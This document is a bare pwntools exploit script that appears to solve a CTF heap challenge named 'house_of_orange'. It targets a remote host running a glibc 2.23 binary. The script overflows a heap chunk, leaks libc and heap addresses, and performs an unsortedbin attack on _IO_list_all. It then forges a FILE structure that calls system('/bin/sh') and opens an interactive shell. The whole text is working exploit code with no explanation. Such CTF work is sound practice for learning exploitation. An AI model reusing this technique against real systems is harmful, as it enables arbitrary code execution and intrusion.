house_of_orange原题
from pwn import *
context(arch='amd64',os='linux',log_level='debug')
myelf = ELF("./pwn")
libc = ELF("./libc-2.23.so")
#io = process(myelf.path,env={"LD_PRELOAD" : libc.path})
io = remote("182.92.203.154",28452)
uu64 = lambda data : u64(data.ljust(8, b'\0'))
sla = lambda delim,data : (io.sendlineafter(delim, data))
sa = lambda delim,data : (io.sendafter(delim, data))
add = lambda index,size,data : (sla(">> ","1"),sla("on(0 ~ 5):",str(index)),sla("turbine: ",str(size)),sa("name: ",data))
show = lambda index : (sla(">> ","2"),sla("viewed: ",str(index)))
edit = lambda index,data : (sla(">> ","3"),sla("turbine: ",str(index)),sa("input: ",data))
#gdb.attach(io,"")
add(0,130,"a"*136+p64(0xf71))
add(1,0x1000,"xuan")
add(2,0x200,"xuan")
# leak libc
edit(0,"a"*144+"b"*8)
show(0);io.recvuntil("b"*8)
libc_addr = uu64(io.recv(6))-0x3c5188
log.success(hex(libc_addr))
edit(0,"a"*136+p64(0xf71))
libc.address = libc_addr
# leak heap
edit(0,"a"*152+"b"*8)
show(0);io.recvuntil("b"*8)
heap_addr = uu64(io.recv(6))
log.success(hex(heap_addr))
edit(0,"a"*136+p64(0xf71))
# unsortedbin attack
data = "a"*(0x290)
payload = "/bin/sh\x00" + p64(0x61)
payload += p64(0) + p64(libc.symbols['_IO_list_all']-0x10)
payload += p64(0) + p64(1)
payload = payload.ljust(0xd8, "\x00")
payload += p64(heap_addr + 0x210 + 0xd8 + 0x8)+p64(libc.symbols['system'])*8
edit(0,data+payload)
# tigger
sla(">> ","1")
sla("on(0 ~ 5):",str(4))
sla("turbine: ",str(200))
io.interactive()